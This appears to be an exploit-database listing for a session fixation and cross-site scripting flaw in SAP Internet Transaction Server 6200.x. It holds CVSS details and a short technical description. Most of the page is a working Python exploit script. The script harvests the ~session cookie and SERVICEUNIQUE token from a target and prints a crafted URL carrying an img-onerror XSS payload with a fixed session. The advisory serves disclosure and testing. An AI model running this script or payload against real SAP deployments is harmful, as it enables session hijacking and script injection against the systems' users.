SAP Internet Transaction Server 6200.x Session Fixation / Cross Site Scripting

Risk: Medium
Local: No
Remote: Yes

CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: SAP Internet Transaction Server (ITS) 6200.X.X - Session Fixation/ Cross-Site Scripting # Dork: /scripts/wgate/ # Date: 25.05.2018 # Exploit Author: J. Carrillo Lencina (0xd0m7) # Vendor Homepage: # Version: SAP ITS 6200.X.X # Category: Webapps # Tested on: All Platforms # CVE: # Description:As it has been determined that there are two vulnerabilities in the latest developed version of SAP ITS, these two vulnerabilities added together give rise to an XSS. #Technical details: It has been determined that when an unauthenticated user navigates through the application, the application assigns a cookie, that cookie is assigned in the parameter ~ session, therefore it could be possible for an attacker to fix the fallo ~ session through a request GET This, together with the fact that the parameter SERVICEUNIQUE has a parameter validation failure, results in a single-use XSS, since the session expires once the method of the request is exchanged and fixed in the URL. #Exploit #!/usr/bin/python import argparse import requests import re parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", help="Example:!") args = parser.parse_args() list=[] i=0 cookie={'s_fid':'3B9C1B379A11790F-00A298287FA44BF5','s_lv':'1524222141316', 's_nr':'1524222141322-New', 's_vnum':'1555758141333%26vn%3D1'} url=args.url.split('/') url2='https://'+str(url[2])+'/'+str(url[3])+'/'+str(url[4])+'/' if args.url: r = requests.get(args.url,verify=False,cookies=cookie) header = r.headers['Set-Cookie'] cookie_val = header.split(";") for line in r.iter_lines(): list.append(line) i=i+1 if line.find('~SERVICEUNIQUE') > 0: param = line.replace('"','') v = param.split('=') val0 = v[3].split(' ') print '[+]Random Value:',val0[0] for line2 in range(len(cookie_val)): if cookie_val[line2].find('~session') == 0: val1 = cookie_val[line2].split('=') print '[+]Session Value:',val1[1] print '[+] Vulnerable URL:'+url2+val0[0]+'%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e/?%7ESERVICEUNIQUE='+val0[0]+'%3cimg%20src%3da%20onerror%3dalert(1)%3e&%7Eclientinput=1&%7Elogininput=1&%7Epasswdinput=1&%7Eclient=100&%7Elogin=%3F&%7Epassword=aaaaa&%7EPOV=P&%7EOkCode%3D%2F0=Entrar&~session='+val1[1] else: print '[!] Empty URL, please see help (-h,--help)'

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019,


Back to Top